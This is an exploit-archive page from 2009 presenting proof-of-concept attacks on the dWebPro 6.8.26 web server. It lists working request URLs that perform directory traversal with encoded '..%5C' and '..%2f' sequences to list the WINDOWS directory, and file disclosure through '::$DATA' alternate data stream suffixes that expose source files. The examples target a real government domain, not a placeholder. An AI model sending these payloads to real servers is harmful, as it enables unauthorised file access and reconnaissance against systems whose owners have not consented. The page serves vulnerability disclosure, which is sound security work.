dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : dWebPro 6.8.26 (DT/FD) Multiple Remote Vulnerabilities
# Published : 2009-04-27
# Author : Alfons Luja
# Previous Title : ARD-9808 DVR Card Security Camera Arbitrary Config Disclosure Vuln
# Next Title : Bopup Communications Server (3.2.26.5460) Remote BOF Exploit (SEH)

############################################
       dWebPro v 6.8.26
============================================
   Remote Directory Tarvelsal  && 
   Remote File Disclosure p0c's
============================================
   Download : http://www.dwebpro.com/downloads/dwebpro_6.8.26.exe
============================================
   Autor : Alfons Luja
   Tested on Win32 xp home 
############################################

   poc 1 Directory Travelsal : we can list directory
   
   http://www.penatgon.gov:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/
   http://www.pentagon.gov:8080/..%2f..%2f..%2fWINDOWS%2f

   poc 2 File Disclosure : we can disclosure any file in a DOCUMENT_ROOT directory 
         by using Alternative Data Streams
   
   http://www.pentagon.gov:8080/../www/500-100-js.asp::$DATA
   http://www.pentagon.gov:8080/demos/aspclassic/asp_registry.asp::$DATA

+++++++++++++++++++++++++++++++++++++++++++++

# www.Syue.com [2009-04-27]